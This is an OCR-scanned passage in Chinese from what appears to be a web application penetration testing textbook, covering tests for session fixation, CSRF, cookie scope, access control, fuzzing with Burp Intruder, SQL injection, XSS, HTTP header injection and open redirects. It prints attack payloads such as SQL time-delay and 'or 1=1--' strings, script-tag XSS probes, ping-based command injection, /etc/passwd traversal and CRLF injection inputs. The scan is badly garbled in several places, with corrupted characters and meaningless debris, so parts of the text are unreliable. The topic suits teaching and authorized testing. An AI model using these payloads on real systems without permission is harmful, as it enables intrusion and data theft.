(2) 即使 应 用 程序 并 不 同 未 通过 验证 的 用 户 发 布 会 话 令 牌 ， 也 可 
通过 登录 获得 一 个 令 牌 ， 然 后 返回 登录 页 面 。 如 果 应 用 程序 “愿意 ”返回 
这 个 页 面 ， 即 使 已 经 通过 验证 ， 也 可 使 用 相同 的 令 牌 以 另 一 名 用 户 的 身 

















份 提交 男 一 次 登录 。 如 果 应 用 程序 在 第 二 次 登录 后 并 不 发 布 一 个 新 令 
牌 ， 就 表示 它 易于 受到 会 话 固定 攻击 。 

(3) 确定 应 用 程序 会 话 令 牌 的 格式 。 用 一 个 捏造 的 、 格 式 有 效 的 
值 修改 令 牌 ， 然 后 党 试 使 用 它 登 录 。 如 果 应 用 程序 允许 使 用 一 个 捏造 的 
令 脾 建立 通过 验证 的 会 话 ， 就 表示 它 易 于 受到 会 话 固 定 攻 击 。 

(4) 如 果 应 用 程序 并 不 支持 登录 功能 ， 但 处 理 敏 感 数据 (如 个 人 
信息 和 支付 细节 )〉 ， 并 在 提交 后 显示 这 些 信息 (如 在 “确认 订单 ”页 面 
E) ， 那 么 可 以 使 用 前 面 的 三 种 测试 方法 尝试 访问 显示 敏感 数据 的 页 
面 。 如 果 在 匿名 使 用 应 用 程序 期 间 生成 的 令 牌 可 用 于 获取 用 户 的 敏感 信 
恩 ， 那 么 应 用 程序 就 易于 遭受 会 话 固定 攻击 。 


21.5.9 检查 CSRF 


(1) 如 果 应 用 程序 完全 依靠 HTTP cookie 传 送 会 话 令 牌 ， 它 很 可 能 
容易 受到 路 站 点 请 求 伪 造 (CSREF) 攻击 。 

(2) 分 析 应 用 程序 的 关键 功能 ， 确 定 用 于 执行 敏感 操作 的 特定 请 
求 。 如 果 这 些 请 求 中 的 参数 完全 可 由 攻击 者 事先 决定 〈 也 就 是 说 ， 其 中 
并 不 包含 任何 会 话 令 牌 、 无 法 预测 的 数据 或 其 他 机 密 ) ， 那 么 几乎 可 以 
肯定 应 用 程序 易于 受到 攻击 。 

(3) 创建 一 个 HTML 页 面 ， 它 不 需要 进行 任何 用 户 交 互 ， 即 可 提 
出 想 要 的 请 求 。 对 于 GET 请 求 ， 可 以 使 用 一 个 <img> 标 签 ， 并 通过 src 参 
数 设置 易 受 攻击 的 URL。 对 于 POST 请 求 ， 可 以 建立 一 个 表单 ， 其 中 包 
含 实施 攻击 所 需 全 部 相关 参数 的 隐藏 字段 ， 并 将 其 目标 设 为 易 受 攻击 的 
URL。 可 以 使 用 JavaScript 在 页 面 加 载 时 自动 提交 该 表单 。 登 录 应 用 程序 
后 ， 使 用 同一 个 浏览 器 加 载 前 面 创建 的 HTML 页 面 。 确 认 应 用 程序 是 否 
执行 想 要 的 操作 。 

(4) 如 果 应 用 程序 为 阻止 CSRF 攻 击 ， 在 请 求 中 使 用 其 他 令 牌 ， 则 
应 以 与 测试 会 话 令 牌 相同 的 方式 测试 这 些 令 牌 的 可 靠 性 。 还 应 测试 应 用 
程序 是 否 易 于 受到 UI 伪装 攻击 ， 以 突破 反 CSRF 防 御 (请 参阅 第 13 章 了 
解 相关 详情 ) 。 
21.5.10 “检查 cookie 范 用 

(1) 如 果 应 用 程序 使 用 HTTP cookie 传 送 会 话 令 牌 (或 任何 其 他 敏 
感 数据 ) ， 那 么 检查 相关 的 SetrCookie 消 息 头 ， 寻 找 用 于 控制 cookie 范 围 


的 所 有 ” 域 ? 或 路径 ”属性 。 
(2) 如果 一 个 应 用 程序 明确 放宽 它 的 cookie 范 围 限 制 ， 将 其 设 定 为 









































一 个 父 域 或 父 目 录 ， 那 么 攻击 者 可 以 通过 以 上 父 域 或 父 目 录 中 的 其 他 
Web 应 用 程序 问 该 应 用 程序 发 动 攻击 。 

(3) 如 果 一 个 应 用 程序 以 它 自 己 的 域名 为 它 的 cookie 域 范围 (或 并 
未 指定 “ 域 * 属 性 ) ， 那 么 它 仍 然 可 能 受到 在 子 域 上 运行 的 应 用 程序 的 威 
胁 。 这 是 设 定 cookie 范 围 造成 的 后 果 ， 只 有 不 在 安全 敏感 的 应 用 程序 的 
子 域 上 运行 其 他 应 用 程序 ， 才 能 避免 这 种 后 果 。 

(4) 确定 对 按 路 径 〈 如 /sitemain 和 /site/demo ) 隔离 的 任何 依赖 情 
况 ， 跨 站 点 脚本 攻击 能 够 破坏 这 种 隔离 。 

(5) 确定 所 有 可 能 收 到 应 用 程序 发 布 的 cookie 的 域名 和 路 径 。 确 定 
是 否 可 通过 这 些 域名 或 路 径 访 问 其 他 Web 应 用 程序 ， 以 及 是 否 可 利用 它 
们 获得 发 布 给 目标 应 用 程序 用 户 的 cookie。 

















21.6 ”测试 访问 控 


21.6.1 了 解 访问 控制 要 求 





图 21-7 测试 访问 控制 








(1) 根据 应 用 程序 的 核心 功能 ， 了 解 访问 控制 在 垂直 隔离 〈 拥 有 
不 同 权限 的 用 户 可 访问 不 同类 型 的 功能 ) 与 水 平 隅 离 〈《 拥 有 相同 权限 的 
用 户 可 访问 不 同 的 数据 ) 方面 的 主要 要 求 ， 通 常 ， 应 用 程序 会 使 用 两 种 
权限 隔离 ， 例 如 ， 普 通用 户 能 够 访问 目 己 的 数据 ， 而 管理 员 则 能 够 访问 
每 个 人 的 数据 。 

(2) 检查 应 用 程序 解析 过 程 得 到 的 结果 ， 确 定 最 可 能 成 为 权限 提 
升 攻 击 目 标的 功能 区 域 与 数据 资源 类 型 。 

(3) 为 提高 测试 访问 控制 漏洞 的 效 紊 ， 渗 透 测 试 员 应 该 获得 大 量 
拥有 不 同 垂 直 权 限 与 水 平权 限 的 账户 。 如 果 应 用 程序 允许 自我 注册 ， 渗 
透 测 试 员 就 可 以 直接 获得 大 量 拥有 不 同 水 平权 限 的 账户 。 为 获得 拥有 不 
同 垂直 权限 的 账户 ， 需 要 得 到 应 用 程序 所 有 者 的 帮助 〈 或 利用 东 个 漏洞 
访问 一 个 高 权限 账户 ) 。 如 后 文 所 述 ， 能 否 获 得 各 种 不 同 的 账户 将 会 对 
能 够 进行 的 测试 产生 直接 影 啊 。 


21.6.2 个 账户 测试 
(1) 如 果 应 用 程序 实施 垂直 权限 隔离 ， 那 么 首先 使 用 一 个 高 权限 


账户 确定 它 能 访问 的 所 有 功能 ， 然 后 再 使 用 一 个 低 权限 账户 答 试 访问 上 
述 每 一 项 功能 。 


























_ Ca) 使 用 Burp 在 一 个 用 户 的 权限 下 浏览 应 用 程序 的 所 有 


(b) 复查 Burp 的 站 点 地 图 内 容 ， 确 保 已 确定 要 测试 的 所 
有 功能 。 然 后 ， 注 销 应 用 程序 并 使 用 男 一 个 用 户 账 户 登录 ; 使 
用 上 下 文 菜 单 选择 “比较 站 点 地 图 ”(compare site maps) J} 
能 ， 确 定 较 低 权 限 的 用 户 可 以 访问 哪些 高 权限 请 求 。 请 参阅 第 
8 章 了 人 解 这 种 技巧 的 更 多 详情 。 

(2) 如 采 应 用 程序 实施 水 平权 限 隅 离 ， 那 么 使 用 两 个 拥有 相同 权 
限 的 不 同 账户 进行 同等 测试 ， 尝 试 使 用 一 个 账户 访问 属于 男 一 个 账户 的 
数据 。 通 常 ， 这 需要 蔡 换 请 求 中 的 一 个 标识 符 〈 如 一 个 文档 ID，〉， 以 指 
定 属于 其 他 用 户 的 资源 。 

(3) 手动 检查 关键 访问 控制 逻辑 。 

对 于 每 个 用 户 权 限 ， 复 查 用 户 可 用 的 资源 。 尝 试 通过 使 用 未 授权 用 
户 的 会 话 令 牌 ， 从 未 授权 用 户 账 户 重 新 提交 请 求 来 访问 这 些 资 源 。 

(4) 进行 访问 控制 测试 时 ， 一 定 要 分 别 测试 多 阶段 功能 的 每 一 个 
步骤 ， 确 定 每 一 个 阶段 是 否 正 确实 施 了 访问 控制 ;或 者 应 用 程序 是 否认 
为 访问 后 一 个 阶段 的 用 户 一 定 通 过 了 前 面 阶段 实施 的 安全 检查 。 例 如 ， 
如 有 果 一 个 包含 表单 的 管理 页 面 受 到 恰当 保护 ， 检 查 提交 表单 的 过 程 中 是 
盏 同样 实施 了 合理 的 访问 控制 。 


21.6.3 K 测试 


(1) 如 果 不 能 优先 访问 不 同 权 限 的 账户 ， 或 者 优先 访问 几 个 能 够 
访问 不 同 数据 的 账户 ， 那 么 测试 不 完善 的 访问 控制 机 制 可 能 相当 困难 。 
由 于 并 不 知道 利用 各 种 缺陷 所 需 的 URL 名 称 、 标 识 符 和 参数 ， 因 此 许多 
常见 的 漏洞 将 更 加 难以 确定 。 

(2) 在 使 用 低 权 限 账 户 解析 应 用 程序 的 过 程 中 ， 渗 透 测试 员 可 能 
己 经 确定 了 访问 管理 接口 等 特权 功能 的 URL。 如 果 这 些 功 能 没有 得 到 充 
分 保护 ， 渗 透 测试 员 可 能 已 经 了 解 了 这 一 点 。 

(3) 反 编 译 现 有 的 所 有 已 编译 客户 端 ， 并 提取 对 服务 器 端 功 能 的 
任何 引用 情况 。 

(4) 大 多 数 受 到 水 平 访问 控制 保护 的 数据 可 使 用 一 个 标识 符 〈 如 
一 个 账号 或 订单 号 ) 访问 。 为 了 使 用 一 个 账户 测试 访问 控制 是 否 有 效 ， 
需要 尝试 、 猜 测 或 发 现 与 其 他 用 户 的 数据 有 关 的 标识 符 。 如 有 可 能 ， 生 
成 一 系列 紧密 相连 的 标识 符 〈( 例 如 ， 通 过 建立 几 个 新 订单 ) ， 尝 试 确 定 
所 有 可 帮助 预测 发 布 给 其 他 用 户 的 标识 符 的 模式 。 如 果 无 法 生成 新 的 标 
识 符 ， 就 只 能 分 析 已 经 确定 的 标识 符 ， 并 根据 这 些 标识 符 猜 测 其 他 标识 


























符 。 

(5) 如 果 能 够 预测 出 发 布 给 其 他 用 户 的 标识 符 ， 使 用 第 14 章 描述 
的 技巧 实施 自动 攻击 ， 获 取 属 于 其 他 用 户 的 有 用 数据 。 可 使 用 Burp 
Intruder 的 Extract Grep 功 能 从 应 用 程序 的 响应 中 截获 相关 信息 。 























(1) 一 些 应 用 程序 根据 请 求 参数 以 一 种 内 在 不 安全 的 方式 实施 访 
问 控制 。 在 所 有 关键 请 求 中 寻找 edit=false 或 access=read 之 类 的 参数 ， 根 
据 它们 的 主要 作用 修改 这 些 参数 ， 和 尝试 破坏 应 用 程序 的 访问 控制 逻辑 。 

(2) 一 些 应 用 程序 根据 HTTP Referer 消 息 头 做 出 访问 控制 决策 。 
例如 ， 一 个 应 用 程序 可 能 对 /admin.jsp 实 施 严 格 的 访问 控制 ， 并 接受 在 
Referer 中 显示 它 的 所 有 请 求 。 为 测试 这 种 行为 ， 和 尝试 执 行 一 些 获 得 授权 
的 特权 操作 ， 并 提交 一 个 其 中 缺少 Referer 消 息 头 或 Referer 消 息 头 被 修改 
的 请 求 。 如 果 这 种 改变 导致 应 用 程序 阻止 请 求 ， 应 用 程序 很 可 能 以 不 安 
全 的 方式 使 用 Referer 消 息 头 。 光 试 使 用 一 个 未 通过 验证 的 用 户 账 户 执行 
但 提交 原始 的 Referer 消 息 头 ， 看 这 时 是 否 能 够 成 功 执行 操 


(3) 如果 站 点 允许 HEAD 方 法 ， 则 应 测试 针对 UREL 的 不 安全 的 容 
器 托管 访问 控制 。 使 用 HEAD 方 法 提出 请 求 ， 确 定 应 用 程序 是 否 允 许 该 
方法 。 














许多 重要 的 漏洞 由 无 法 预测 的 用 户 输入 触发 ， 并 可 条 
序 的 任何 位 置 。 用 一 组 攻击 字符 串 模 糊 测试 每 个 请 求 的 每 一 个 参数 ， 
在 应 用 程序 中 探查 这 种 漏洞 的 有 效 方法 。 





21.7.1 模糊 测试 所 有 请 求 僚 数 





21.7.4 OS# J | 21.7.58 f | 21.7.6 脚本 |21.7.7 文 件 
注 | 遍历 注入 包含 


图 21-8 测试 基于 输入 的 漏洞 




















C1) 检查 应 用 程序 解析 过 程 中 获得 的 结果 ， 确 定 所 有 提交 由 服务 
器 端 应 用 程序 处 理 的 参数 的 特殊 客户 端 请 求 。 相 关 参 数 分 别 位 于 UREL 碍 
询 字 符 串 、 请 求 主 体 及 HTTP cookie 中 。 它 们 还 包括 所 有 给 应 用 程序 行 
为 造成 影响 的 用 户 提 交 的 数据 ， 如 Referer 或 User-Agent 消 息 头 。 

(2) 要 对 这 些 参 数 进行 模糊 测试 ， 可 以 使 用 自己 的 脚本 ,或 者 现 
成 的 模糊 测试 工具 。 例 如 ， 如 果 使 用 Burp Intruder， 可 轮流 在 工具 中 加 
载 每 一 个 请 求 。 一 个 简单 的 方法 是 在 Burp Proxy 中 拦截 一 个 请 求 ， 然 后 
选择 “发 送 至 Intruder” 操 作 ; 或 者 在 Burp Proxy 历 史记 录 中 单 击 一 个 请 
求 ， 再 选择 这 个 选项 。 使 用 这 个 选项 将 在 Burp Intruder 中 配置 请 求 的 内 
容 、 正 确 的 目标 主机 和 端口 ， 然 后 Burp Intruder 上 自动 将 所 有 请 求 参数 的 
值 标记 为 有 效 载荷 位 置 ， 准 备 进 行 模 糊 测试 。 

(3) 使 用 “有 效 载荷 ?选项 卡 ， 配 置 一 组 适当 的 攻击 有 效 载荷 ， 在 
应 用 程序 中 探查 漏洞 。 可 以 手动 输入 有 效 载 千 ， 从 一 个 文件 中 加 载 它 
itd 或 者 选择 一 个 预先 i 投 定 的 有 效 载 集 列表 。 模 糊 测 试 应 用 程序 中 的 第 
一 个 请 求 参 数 往往 需要 友 布 数目 庞大 的 请 求 ， 并 在 结果 中 查找 反常 现 
象 。 如 果 设 定 的 攻击 字符 串 过 多 ， 这 样 反而 达 不 到 预期 的 目标 ， 其 至 生 
成 无 数 的 输入 ， 以 致 很 难 对 其 进行 分 析 。 因 此 ， 较 为 明智 的 做 法 是 ， 测 








试 一 系列 可 在 特定 的 专门 设计 的 输入 的 反常 啊 应 中 轻易 确定 的 常见 漏 
洞 ， 以 及 出 现在 应 用 程序 的 所 有 位 置 而 非 某 些 特殊 功能 中 的 漏洞 。 可 以 
使 用 以 下 一 组 有 效 载 荷 测试 一 些 第 见 的 漏洞 。 

® SQL 注入 





'; waitfor delay '0:30:0'-- 
1; waitfor delay '0:30:0'-- 
"XSS SAS EA 
xsstest 
"><script>alert ('xss')</script> 
© OS 命令 注入 


|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & 


| ping -i 30 127.0.0.1 | 
| ping -n 30 127.0.0.1 | 
& ping -i 30 127.0.0.1 & 
& ping -n 30 127.0.0.1 & 


; ping 127.0.0.1 ; 
$0a ping -i 30 127.0.0.1 %0a 
- ping 227 20.0.5 * 


© KIEN 


./etc/passwd 
./boot.ini 
. \etc\passwd 
.\boot.ini 


. . . . 
. . . * 
ee, E ee 
. . . . 


. . . . 
ge oe A oe 
. . . . 
. . . . 
. . . + 
He i 
. . . . 
. . . . 
i ee w 
. . . . 
. . . . 
a ee Pe. Th 
. . . . 
a ee! ee 
oe: gad Tes ae 
~ ee a D 


@ 脚本 注入 
secho 111111 
echo 111111 


response.write 111111 
:response.write 111111 


@ 文件 包含 


http://<your server name>/ 
http://<nonexistent IP address>/ 
(4) BITE ATA AYA ca tar SY DAF TA AN, a a By t+ 空格 
与 = 字符 因为 在 HITP 请 求 中 有 特殊 含义 ， 需 要 进行 URL 编 码 。 默 认 情 况 
下 ，Burp Intruder 会 对 这 些 字 符 进 行 必要 的 编码 ， 因 此 ， 必 须 确保 该 选 
项 没有 人 被 禁 用 。 如果 想 要 在 定制 后 将 所 有 选项 恢复 到 它们 的 默认 值 ， 
可 从 Burp 沫 单 中 选择 “恢复 默认 值 ? 选 项 。) 
(5) 在 Burp Intruder 的 Grep 功 能 中 ， 配 置 一 组 合适 的 字符 串 ， 标 记 
啊 应 中 的 一 些 常见 的 错误 消息 。 例 如 : 


error 











exception 
illegal 
invalid 
fail 
stack 
access 
directory 
file 

not found 
varchar 
ODBC 

SQL 
SELECT 
173317 


请 注意 ， 其 中 的 字符 串 111111 用 于 测试 成 功 的 脚本 注入 攻击 ; 

21.7.1 节 第 3 步 中 的 有 效 载 集 要 求 将 这 个 值 写 入 服务 器 的 啊 应 中 。 

(6) 同时 ， 选 择 “ 有 效 载 集 Grep” 选 项 ， 标 记 包 含有 效 载 集 自 丑 的 
啊 应 ， 该 啊 应 表示 可 能 存在 XSS 或 消息 头 注 入 漏洞 。 

(7) 在 通过 第 一 个 文件 包含 有 效 载 丛 指定 的 主机 上 建立 一 个 Web 
ee 监控 服务 器 由 于 远程 文件 包含 攻击 而 发 出 的 连 

E te 

(8) 实施 并 完成 攻击 后 ， 在 结果 中 查找 表示 存在 漏洞 的 反常 啊 
应 。 检 查 HTTP 状 态 码 、 啊 应 长 度 、 啊 应 时 间 、 其 中 是 否 出 现 配 置 的 表 
TATU RET HWA OC a AR. BY DLR ARR BE Pl el, HT 























列 中 的 值 进行 分 类 【〔( 按 下 Shift 键 的 同时 单 击 女 标 可 对 结果 进行 反问 排 
序 ) ， 这 样 做 可 迅速 确定 所 有 不 同 于 其 他 结果 的 反常 啊 应 。 

(9) 参考 本 章 后 文 对 每 一 类 问题 的 详细 描述 ， 对 模糊 测试 结果 表 
bs a 的 每 一 个 潜在 的 漏洞 进 行 确认 ， 同 时 考虑 如 何 成 功 地 利用 这 
we yj iF o 

(10) 一旦 配置 Burp Intruder 对 某 个 请 求 进行 模糊 测试 后 ， 就 可 以 
迅速 地 对 应 用 程序 中 的 其 他 请 求 进行 相同 的 测试 。 在 Burp Proxy 中 选 定 
日 标 请 求 ， 再 选择 “发 送 至 Intruder” 选 项 ， 就 可 以 立即 使 用 现 有 的 测试 选 
项 在 Intruder 中 进行 测试 。 这 样 ， 束 可 以 同时 在 单独 的 窗口 中 进行 大 量 
测试 ， 在 测试 完成 后 手动 检查 测试 结果 。 

(11) 如果 在 解析 应 用 程序 的 过 程 中 确定 了 帝 外 输入 通道 ， 可 通过 
它们 回应 用 程序 提交 用 户 可 控制 的 输入 。 渗 透 测试 员 应 当 通 过 提交 各 种 
站 在 触发 常见 的 Web 应 用 程序 漏洞 的 专门 设计 的 数据 ， 对 这 些 输入 通道 
进行 类 似 的 模糊 漏洞 。 根 据 输入 通道 的 特点 ， 可 能 需要 建立 一 个 定制 脚 
本 或 其 他 工具 。 

(12) 除了 手动 对 应 用 程序 请 求 进行 模糊 测试 外 ， 如 果 拥 有 一 个 自 
动 化 web 应 用 程序 漏洞 扫 摘 器 ， 还 应 当 运 行 该 扫描 器 ， 对 目标 应 用 程序 
进行 目 动 测试 ， 并 比较 两 方面 的 测试 结果 。 


21.7.2” 测 试 SQL 注 


C1) 如 果 发 现 21.7.1 节 第 3 步 中 列 出 的 SQL 攻击 字符 串 导 致 任何 反 
常 啊 应 ， 那 么 应 该 手动 探查 ， 观 察 应 用 程序 如 何 处 理 相 关 参 数 ， 确 定 其 
中 是 否 存在 SQL 注入 漏洞 。 

(2) 如 果 提 交 上 述 字 符 串 返回 错误 消息 ， 分 析 这 些 消 息 的 意义 。 
可 以 根据 9.2.13 节 提供 的 信息 了 解 错误 消息 在 常用 数据 库 平 台中 的 含 


Mo 

(3) WREEK AGES “SE S| SB E SUL EL Ae IS FS AT 
为 ， 可 答 试 提交 两 个 单 引 号 ;如果 这 种 输入 使 错误 或 异常 行为 消失 ， 应 
用 程序 可 能 易于 受到 SQL 注入 。 

(4) 设法 使 用 常用 的 SQL 字符 串 连 接 符 图 数 构 建 一 个 等 同 于 民 性 
输入 的 字符 串 。 如 果 提 交 这 个 字符 串 得 到 与 提交 原始 的 民 性 输入 相同 的 
啊 应 ， 那 么 应 用 程序 可 能 易于 受到 攻击 。 例 如 ， 如 果 原 始 输入 为 表达 式 
FOO， 可 以 使 用 下 面 的 输入 测试 : 









































' (POO (注意 ， 引 号 之 间 有 空格 ) 





BY Reed eae ee eters ere 
URL 编 码 。 

(5) 如 果 原 始 输入 为 数字 字符 ， 尝 试 使 用 一 个 其 结果 等 于 原始 值 
的 数学 表达 式 。 例 如 ， 如 果 原 始 值 为 >， 尝试 提交 1+1 或 3-1。 如 果 应 用 
程序 做 出 相同 的 啊 应 ， 表 示 它 易于 受到 攻击 ; 如 果 数 字 表 达 式 的 值 对 应 
用 程序 的 行为 造成 系统 性 的 影响 ， 那 么 应 用 程序 就 特别 容易 受到 攻击 。 

(6) 如果 前 面 的 测试 取得 成 功 ， 可 以 通过 使 用 针对 SQL 的 数学 表 
达 式 构造 一 个 特殊 的 值 ， 进 一 步 确定 SQL 注入 漏洞 是 否 存在 。 如 果 可 以 
通过 这 种 方式 系统 性 地 控制 应 用 程序 的 逻辑 ， 那 么 几乎 可 以 肯定 应 用 程 
序 易 于 受到 SQL 注入 攻击 。 人 例如， 下面 两 个 表达 式 的 结果 都 等 于 2: 














(7) 如 果 使 用 waitfor 命 令 进 行 的 模糊 漏洞 测试 导致 应 用 程序 在 进 
行 响应 时 出 现 反 常 的 时 间 延 迟 ， 那 么 所 使 用 的 数据 库 为 MS-SQL， 且 应 
用 程序 易于 受到 SQL 注入 攻击 。 手 动 重复 测试 ， 在 waitfor 参 数 中 指定 不 
同 的 值 ， 确 定 啊 应 时 间 是 否 随 着 这 个 值 而 发 生 系统 性 的 变化 。 请 注意 ， 
可 以 在 几 个 SQL 和 查询 中 插入 攻击 有 效 载荷 ， 这 时 观察 到 的 时 间 延 迟 为 指 
定 值 的 固定 倍数 。 

(8) 如 果 应 用 程序 易于 受到 SQL 注 入 攻击 ， 渗 透 测试 员 要 考虑 可 
以 实施 哪些 攻击 ， 以 及 如 何 利 用 它们 实现 自己 的 目的 。 请 参考 第 9 章 了 
解 实 施 以 下 攻击 的 详细 步骤 。 
口 修改 WHERE 子 句 中 的 条 件 ， 改 变 应 用 程序 的 逻辑 〈 例 
如 ， 注 入 or 1=1-- 避 开 登 录 ) 。 
口 使 用 UNION 操 作 符 注入 任意 一 个 SELECT 查询 ， 将 它 的 
结果 与 应 用 程序 的 原始 查询 的 结果 组 合 在 一 起 。 
口 使 用 针对 数据 库 的 SQL 语法 “指纹 标识 ”数据 库 类 型 。 
口 如 果 使 用 的 数据 库 为 MS-SQL， 且 应 用 程序 在 响应 中 返 
回 ODBC 错 误 消息 ， 利 用 这 些 信息 枚 举 数 据 库 结 构 ， 获 取 任 意 














数据 。 
口 如 有 果 无 法 获得 一 个 任意 输入 的 碍 询 的 结果 ， 可 以 使 用 以 
下 攻击 技巧 提取 数据 。 


E 获取 数字 格式 的 字符 串 数据 ， 一 次 一 个 字 节 。 

m 使 用 币 外 通道 。 

E 如 采 能 够 根据 任意 一 个 条 件 引发 不 同 的 应 用 程 
序 啊 应 ， 可 使 用 Absinthe 提 取 任 意 数 据 ， 一 次 一 比 


特 。 
m 如 果 能 够 根据 一 个 任意 的 条 件 触 发 时 间 延 迟 ， 





利用 它们 获取 数据 ， 一 次 一 比特 。 
口 如 果 应 用 程序 阻止 实施 特殊 攻击 所 需 的 茶 些 字符 或 表达 
式 ， 演 试 使 用 第 9 章 摘 述 的 各 种 技巧 吉 开 输入 过 小。 
口 如 有 可 能 ， 利 用 漏洞 或 强大 的 数据 库 函 数 ， 将 攻击 范围 
扩大 到 数据 库 与 基础 服务 器 中 。 


21.7.3 ”测试 XSS 和 其 他 啊 应 注 


1. 确定 反射 型 请 求 参数 

(1) 单 击 “有 效 载荷 Grep” 列 ， 分 类 模糊 漏洞 测试 的 结果 ， 确 定 任 
何 与 21.7.1 节 第 3 步 中 列 出 的 XSS 有 效 载荷 相 匹配 的 字符 串 。 这 些 是 在 应 
用 程序 啊 应 中 按 原样 返回 的 XSS 测 试 字符 串 。 

(2) 对 于 上 述 每 一 个 字符 串 ， 检 查 应 用 程序 的 啊 应 ， 查 找 用 户 提 
交 的 输入 的 位 置 。 如 果 该 字符 串 出 现在 响应 主体 中 ， 应 测试 应 用 程序 中 
是 否 存在 XSS 漏 洞 。 如 果 它 出 现在 HTTP 消息 头 中 ， 应 测试 应 用 程序 中 
是 否 存在 消息 头 注入 漏洞 。 如 果 它 被 用 在 302 咱 应 的 Location 消 息 头 中 ， 
或 者 用 于 以 某 种 方式 指定 重 定向 ， 应 测试 应 用 程序 中 是 否 存在 重 定向 漏 
洞 。 请 注意 ， 同 一 个 输入 可 能 会 被 复制 到 啊 应 中 的 几 个 位 置 ， 因 此 应 用 
程序 中 可 能 存在 几 种 类 型 的 反射 型 漏洞 。 

2. 测试 反射 型 XSS 

(1) 对 于 在 响应 主体 中 出 现 的 所 有 请 求 参 数 ， 检 查 它 周围 的 
HTML 人 代码， 确定 是 否 可 以 提交 专门 设计 的 输入 ， 从 而 执行 任意 
JavaScript 脚 本 。 例 如 ， 通 过 注入 <script> 标 签 ， 注 入 一 段 现 有 代码 ， 或 
在 一 个 标签 属性 中 插入 精心 设计 的 值 ， 执 行 任意 JavaScript 脚 本 。 

(2) 将 第 12 章 讲述 的 攻破 签名 过 滤器 的 各 种 方法 作为 参考 ， 了 解 
如 何 利用 专门 设计 的 输入 执行 任意 JavaScript 脚 本 。 

(3) 尝试 同 应 用 程序 提交 各 种 可 能 的 输入 ， 监 控 它 的 啊 应 ， 确 定 
应 用 程序 是 否 对 输入 进行 任何 过 滤 或 净化 。 如 果 攻 击 字 符 串 被 原样 返 
回 ， 使 用 浏览 器 确认 成 功 执行 了 任意 JavaScript 脚 本 〈 例 如 ， 通 过 生成 一 
个 警报 对 话 框 ) 。 

(4) 如 果 发 现 应 用 程序 阻止 需要 使 用 的 某 些 字符 串 或 表达 式 ， 或 
ee 尝试 使 用 第 12 章 描述 的 各 种 技巧 避 开 过 

(5) 如 果 在 一 个 POST 请 求 中 发 现 了 XSS 漏 洞 ， 仍 然 可 以 通过 一 个 
包含 表单 的 恶意 Web 站 点 ， 由 必要 的 请 求 参数 和 一 段 脚本 自动 提交 该 表 
单 ， 对 这 个 漏洞 加 以 利用 。 但 是 ， 如 果 可 以 通过 GET 请 求 利 用 漏洞 ， 就 
可 以 使 用 大 量 的 攻击 传送 机 制 。 尝 试 在 GET 请 求 中 提交 相同 的 参数 ， 看 



































攻击 是 个 仍然 取得 成 功 。 可 以 使 用 Burp Proxy 的 “改变 请 求 命 
4” (Change Request Method) 操作 转换 请 求 类 型 。 

3. 测试 HITP 消 息 头 注入 

C1) 对 于 在 啊 应 消息 头 中 出 现 的 每 一 个 请 求 参数 ， 确 认 应 用 程序 
是 否 接受 URL 编 码 的 回 车 〈9%0d) 与 换行 (%0a) 符 ， 以 及 它们 是 否 按 
原样 在 啊 应 中 返回 。 请 注意 ， 在 服务 器 的 啊 应 中 寻找 的 是 换行 符 本 丑 ， 
而 不 是 它们 的 URL 编 码 形式 。 

(2) 如 果 在 提交 专门 设计 的 输入 后 ， 服 务 器 的 啊 应 消息 头 新 增 了 
一 行 ， 那 么 应 用 程序 易 受 HTTP 消 息 头 注入 攻击 。 如 第 13 章 所 述 ， 攻 击 
者 可 以 利用 这 种 漏洞 实施 各 种 攻击 。 

(3) 如 果 服 务 器 的 啊 应 中 仪 返回 两 个 换行 符 中 的 一 个 ， 根 据 实际 
情况 ， 仍 可 以 设计 出 有 效 的 攻击 方法 。 

(4) 如 果 发 现 应 用 程序 阻止 包含 换行 符 的 输入 ， 或 者 净化 出 现在 
响应 中 的 这 些 字 符 ， 壬 试 使 用 下 面 的 输入 测试 过 滤 的 效率 : 

foo%00%0d%0abar 

foo%250d%250abar 

foo%%0d0d%%0a0abar 


4. 测试 任意 重 定向 

(1) 如 果 反 射 型 输入 用 于 指定 某 类 重 定 向 的 目标 ， 测 试 是 否 可 以 
提交 专门 设计 的 输入 ， 生 成 指向 一 个 外 部 Web 站 点 的 任意 重 定向 。 如 果 
可 以 ， 渗 透 测 试 员 就 可 以 利用 这 种 行为 提高 钓鱼 攻击 的 可 信和 度 。 

(2) 如 果 应 用 程序 以 参数 值 的 形式 传送 绝对 URL， 那 么 修改 URL 
中 的 域名 ， 测 试 应 用 程序 是 否 重 定向 到 不 同 的 域 。 

(3) 如 果 参 数 中 包含 一 个 相对 URL， 将 这 个 URL 修 改 成 指向 另 一 
个 域 的 绝对 URL， 并 测试 应 用 程序 是 否 重 定向 到 这 个 域 。 

(4) 如 果 应 用 程序 为 防止 外 部 重 定 向 ， 在 进行 重 定向 前 对 参数 进 
行 某 种 形式 的 确认 ， 通 常 仍然 可 以 轻易 避 开 这 种 确认 。 尝 试 使 用 第 13 章 
描述 的 各 种 攻击 测试 过 滤 的 效率 。 

5. 测试 保存 型 攻击 

(1) 如 果 应 用 程序 保存 用 户 提 交 的 输入 ， 并 随后 在 屏幕 上 显示 这 
些 输入 ， 那 么 ， 在 模糊 测试 整个 应 用 程序 后 ， 可 能 会 发 现 攻击 字符 串 在 
本 身 并 未 包含 这 些 字符 串 的 请 求 的 响应 中 返回 。 留 意 这 种 情况 ， 确 定 被 
保存 数据 的 原始 进入 点 。 

(2) 有 时 ， 只 有 完成 一 个 多 阶段 过 程 ， 用 户 提 交 的 数据 才 被 成 功 
保存 。 如 果 在 应 用 程序 解析 过 程 中 确定 这 种 功能 ， 那 么 手动 完成 相关 过 
程 ， 并 在 被 保存 的 数据 中 查找 XSS 漏 洞 。 












































(3) 如 果 拥 有 足够 的 访问 权限 ， 应 仔细 审查 可 在 更 高 权限 的 用 户 
会 话 中 显示 低 权 限 用 户 的 数据 管理 功能 。 管 理 功能 中 存在 的 任何 保存 型 
XSS 漏 洞 往往 会 直接 导致 权限 提升 。 

(4) 测试 用 户 提交 的 数据 被 保存 且 辐 该 用 户 显示 的 每 一 种 情况 。 
测试 这 些 情 况 ， 从 中 查找 上 述 XSS 和 其 他 啊 应 注入 漏洞 。 

(5) 如 果 发 现 一 个 漏洞 将 一 名 用 户 提 交 的 输入 显示 给 其 他 用 户 ， 
渗透 测试 员 要 确定 可 用 于 实现 目标 的 最 佳 攻击 有 效 载荷 ， 如 会 话 劫持 或 
